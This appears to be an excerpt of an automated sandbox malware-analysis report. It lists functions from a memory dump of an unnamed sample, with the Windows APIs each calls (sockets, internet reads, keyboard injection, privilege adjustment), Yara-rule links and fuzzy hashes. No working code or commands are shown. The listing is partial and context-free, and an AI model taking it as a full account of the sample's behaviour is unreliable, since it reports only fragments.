                                                                                                                                                                                      Function 009596E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0095ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0095ACF5
                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0095973D
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00959760
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4170576061-0
                                                                                                                                                                                      • Opcode ID: e510f0d52576267497a43cebe62534a3cc31dcda1d440f2d3115594259589186
                                                                                                                                                                                      • Instruction ID: 7579882291a274c459b72464f8ca52ca3cefed1730f94249741c047d2a7fe38a
                                                                                                                                                                                      • Opcode Fuzzy Hash: e510f0d52576267497a43cebe62534a3cc31dcda1d440f2d3115594259589186
                                                                                                                                                                                      • Instruction Fuzzy Hash: D841C170600204AFEB10AF64CC82FAE77EDDF84724F148048F956AB3D2CA74AD418B91
                                                                                                                                                                                      Function 0094F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0094F37A
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0094F3AA
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0094F3BF
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0094F3D0
                                                                                                                                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0094F3FE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2387731787-0
                                                                                                                                                                                      • Opcode ID: b26084bb93566253b24dacb9b74d4f32d1d7a58902fecf3e6c18acfcc9ed15f8
                                                                                                                                                                                      • Instruction ID: 965dc764a0b4e6d3765f15d23c4744d5bdcdc23f7de744359bb722c45887fc5b
                                                                                                                                                                                      • Opcode Fuzzy Hash: b26084bb93566253b24dacb9b74d4f32d1d7a58902fecf3e6c18acfcc9ed15f8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 94418C356047029FC708DF28C4A4E9AB3E9FF89328F10456DE95ACB3A1DB31A955CB91
                                                                                                                                                                                      Function 009620F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,009620EC,?,009622E0), ref: 00962104
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00962116
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                      • String ID: GetProcessId$kernel32.dll
                                                                                                                                                                                      • API String ID: 2574300362-399901964
                                                                                                                                                                                      • Opcode ID: 11136291548e9f5a64fb8ad2dd1da0c4b0800b0a61d14ae7fa031d94972d275a
                                                                                                                                                                                      • Instruction ID: 3b93d802c000778c63c3cb37fb5b990af9cf9c688a94cacfe64580a136d5b60f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 11136291548e9f5a64fb8ad2dd1da0c4b0800b0a61d14ae7fa031d94972d275a
                                                                                                                                                                                      • Instruction Fuzzy Hash: F6D0A73441CB129FD7305F61E80D65637D8AF44714B014419EA59D1295D7B0C480CB10
                                                                                                                                                                                      Function 00944342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0094439C
                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 009443B8
                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00944425
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00944483
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                      • Opcode ID: 3b60da2b3bab1c046ea8f4cfe1b59bea6dbede3e03132a8853512594c80bde85
                                                                                                                                                                                      • Instruction ID: b37dbb7711a0bd447b4826fde23fd936f1ecc9eb9ebe2593e9e3430314b909d2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b60da2b3bab1c046ea8f4cfe1b59bea6dbede3e03132a8853512594c80bde85
                                                                                                                                                                                      • Instruction Fuzzy Hash: 244148B0A04248AEEF309B64D808FFDBBF9AF95315F04411AF481932D1C7788D85D761
                                                                                                                                                                                      Function 0094220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0094221E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                      • String ID: ($|
                                                                                                                                                                                      • API String ID: 1659193697-1631851259
                                                                                                                                                                                      • Opcode ID: 0d693caecbc989e9fd3065a0876ebd8dafa895eb10a3fbdc96208ab74225ab94
                                                                                                                                                                                      • Instruction ID: fa6cf2ff3c59b18440675fb8e842da06077778d9aa78410aecfb873361160c16
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d693caecbc989e9fd3065a0876ebd8dafa895eb10a3fbdc96208ab74225ab94
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D321475A046059FCB28CF69C480E6AB7F1FF48720B51C56EE49ADB3A2E770E941CB44
                                                                                                                                                                                      Function 0091AD5C Relevance: 4.9, APIs: 3, Instructions: 378COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0091AF8E
                                                                                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 0091AE5E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LongProcWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3265722593-0
                                                                                                                                                                                      • Opcode ID: c01d7b4df689338b630552a85b9dd14d32bb0d154eddcbf8dbf93615511eb061
                                                                                                                                                                                      • Instruction ID: 857e7c5040c7b7d5adc0aa0e40b4289c00232e17361addac9efb8efa542f400d
                                                                                                                                                                                      • Opcode Fuzzy Hash: c01d7b4df689338b630552a85b9dd14d32bb0d154eddcbf8dbf93615511eb061
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CA1416531620CBEDB289B695CACEFF395DDB82781F104929F405E61E2C919CC81E2B3
                                                                                                                                                                                      Function 0095550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00954A1E,00000000), ref: 009555FD
                                                                                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00955629
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 599397726-0
                                                                                                                                                                                      • Opcode ID: e3cd6023032e740c4f31980d967792d721decd307c5f10452c0847d047b61035
                                                                                                                                                                                      • Instruction ID: 4c7d3e99ffa107305607a570dc8968d4c4b58ae52c014bfd0ad303c9dbc7e168
                                                                                                                                                                                      • Opcode Fuzzy Hash: e3cd6023032e740c4f31980d967792d721decd307c5f10452c0847d047b61035
                                                                                                                                                                                      • Instruction Fuzzy Hash: 75412971504609FFEB10DF92DC95FBF77BDEB80329F10401AFA01A6182EA709E459750
                                                                                                                                                                                      Function 0094EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0094EA95
                                                                                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0094EAEF
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0094EB3C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1682464887-0
                                                                                                                                                                                      • Opcode ID: 5eb3007ee9c2e934c658237ffb86ea9188441ba8f2aac00f0a472f91dc87b0e2
                                                                                                                                                                                      • Instruction ID: a458da87db168cb02445f7853d54b2c0af2c5a688448fb21c84cc002a1a8a6ae
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eb3007ee9c2e934c658237ffb86ea9188441ba8f2aac00f0a472f91dc87b0e2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E215135A10218EFCB00EFA5D894EEEBBB4FF88310F148499E445A7351DB31D955CB50
                                                                                                                                                                                      Function 009470AE Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009470D8
                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00947115
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0094711E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 33631002-0
                                                                                                                                                                                      • Opcode ID: 5b996bdc1991b1d4d61dd9ec174c41e054651418cb3ceae0da201dc77827e315
                                                                                                                                                                                      • Instruction ID: 92171ae325c72edbda1bd348ec9b215f0d0cb593ddd879953e7f98fb4201a4bb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b996bdc1991b1d4d61dd9ec174c41e054651418cb3ceae0da201dc77827e315
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0011A5B1919228BEE7109BE8DC49FAFB7BCEB08714F004555B901E71D0D3749E0487E1
                                                                                                                                                                                      Function 00906670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                      • Opcode ID: 810c72b7953f7773e89e41fd998ef6f8ea3c148f7999646e845d531f1e2428e0
                                                                                                                                                                                      • Instruction ID: 6b1876d90d99a1c8ecb834a00c6b1774b190f85ca4a0c57d379a6b085d51b077
                                                                                                                                                                                      • Opcode Fuzzy Hash: 810c72b7953f7773e89e41fd998ef6f8ea3c148f7999646e845d531f1e2428e0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EA27E75E04219CFCB24DF98C8806ADBBB5FF48314F2581AAE859AB390D734AD91DF50
                                                                                                                                                                                      Function 0094D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0095C2E2,?,?,00000000,?), ref: 0094D73F
                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0095C2E2,?,?,00000000,?), ref: 0094D751
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                                      • Opcode ID: 1e23e89cbf153ea98b18c29cc83fc268643bf5c2a874aa5f8df331ca0830bd5f
                                                                                                                                                                                      • Instruction ID: b4ee2fa55330e6490ed65d25a189ec90711c7ac8bcb578df3366c1e4eede3b84
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e23e89cbf153ea98b18c29cc83fc268643bf5c2a874aa5f8df331ca0830bd5f
                                                                                                                                                                                      • Instruction Fuzzy Hash: A9F08C7510532DABDB21AFA4CC49FEE77ACAF89361F008115B919D6181D6309A40DBA0
                                                                                                                                                                                      Function 00944B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00944B89
                                                                                                                                                                                      • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00944B9C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InputSendkeybd_event
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3536248340-0
                                                                                                                                                                                      • Opcode ID: 7c76953b71b0cd345bf0fc8fc8949768ce8eeb82f57b6b9fff5736d2afcef97b
                                                                                                                                                                                      • Instruction ID: 779ff817238bc5e064911c7aa5122e0ea37d14e8a1cd1ca43484376186d6b751
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c76953b71b0cd345bf0fc8fc8949768ce8eeb82f57b6b9fff5736d2afcef97b
                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF0677091424EAFEB058FA0C805BBEBBB4EF00305F00840AF961A6291D379C612AFA0
                                                                                                                                                                                      Function 0093B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0093B9EC), ref: 0093B8C5
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,0093B9EC), ref: 0093B8D7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 81990902-0
                                                                                                                                                                                      • Opcode ID: ffa0fd80a34c9f3c264ed90cbed287f519aa6fe03a08657036069cf43e393559
                                                                                                                                                                                      • Instruction ID: 6eb23e6784de6935774919f2d08af7714933a19f92a3dbfb45c02da654018155
                                                                                                                                                                                      • Opcode Fuzzy Hash: ffa0fd80a34c9f3c264ed90cbed287f519aa6fe03a08657036069cf43e393559
                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E0EC72018611AFE7262B60FC09E77BBEDEF44321B10882DF59685475DB62ACE0EB10
                                                                                                                                                                                      Function 00928E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,0090125D,00927A43,00900F35,?,?,00000001), ref: 00928E41
                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00928E4A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                      • Opcode ID: e108603fcc8565f0f3e00e1373a10ee9d579f6213810bd1dc6fb0c4a345e67e1
                                                                                                                                                                                      • Instruction ID: 83ada57c7e12468b55baa6e88ae2fcb49805efd3cdb1740b773bea3971b15a38
                                                                                                                                                                                      • Opcode Fuzzy Hash: e108603fcc8565f0f3e00e1373a10ee9d579f6213810bd1dc6fb0c4a345e67e1
